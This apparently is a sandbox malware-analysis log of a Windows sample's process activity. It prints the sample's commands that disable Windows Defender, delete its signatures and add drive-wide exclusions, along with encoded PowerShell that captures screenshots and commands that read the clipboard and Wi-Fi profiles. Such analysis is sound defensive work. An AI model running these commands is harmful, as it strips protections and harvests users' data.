Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

Modifies the context of a thread in another process (thread injection)

Source: C:\ProgramData\setup.exe

Thread register set: target process: 2288

Removes signatures from Windows Defender

Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

Writes to foreign memory regions

Source: C:\ProgramData\setup.exe

Memory written: C:\Windows\System32\dialer.exe base: C991E5F010

Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAaQBqACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHIAcgBwACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAZQByAHIAbwByADoAIABlAHgAcABlAGMAdABlAGQAIAAnACcAOwAnACcAIABiAGUAZgBvAHIAZQAgACcAJwByAGUAdAB1AHIAbgAnACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGgAegB5ACMAPgA="	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZABtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAawBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGEAbgBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAbAB5ACMAPgA="	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Process created: C:\Users\user\AppData\Roaming\RuntimeBroker.exe "C:\Users\user\AppData\Roaming\RuntimeBroker.exe"	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Process created: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe "C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Process created: C:\Users\user\AppData\Roaming\RuntimeBroker.exe "C:\Users\user\AppData\Roaming\RuntimeBroker.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe -pbeznogym	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 460 -p 7176 -ip 7176	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7176 -s 2308	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe -pbeznogym
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Process created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Process created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"
Source: C:\ProgramData\Microsoft\hacn.exe	Process created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft\hacn.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe -pbeznogym
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe -pbeznogym
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Process created: C:\ProgramData\svchost.exe "C:\ProgramData\svchost.exe"
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Process created: C:\ProgramData\setup.exe "C:\ProgramData\setup.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
Source: C:\ProgramData\svchost.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe"
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rbycypt0\rbycypt0.cmdline"
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process created: unknown unknown
Source: C:\ProgramData\setup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r1ffbxq0\r1ffbxq0.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5269.tmp" "c:\Windows\System32\CSCCC22D6FAD44545049E46F17EB7F694E7.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5528.tmp" "c:\Users\user\AppData\Local\Temp\r1ffbxq0\CSCD4520F5E8E664C3288A2F8DB92B7943B.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagkaaqbqacmapgbbagqazaatafqaeqbwaguaiaataeeacwbzaguabqbiagwaeqboageabqblacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsapaajahiacgbwacmapgbbafmaeqbzahqazqbtac4avwbpag4azabvahcacwauaeyabwbyag0acwauae0azqbzahmayqbnaguaqgbvahgaxqa6adoauwboag8adwaoaccazqbyahiabwbyadoaiablahgacablagmadablagqaiaanaccaowanaccaiabiaguazgbvahiazqagaccajwbyaguadab1ahiabganaccajwasaccajwasaccatwblaccalaanaeuacgbyag8acganackapaajaggaegb5acmapga="
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagqazabtacmapgbbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajahuaawbpacmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajageabgbiacmapgagac0argbvahiaywblacaapaajahkabab5acmapga="
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
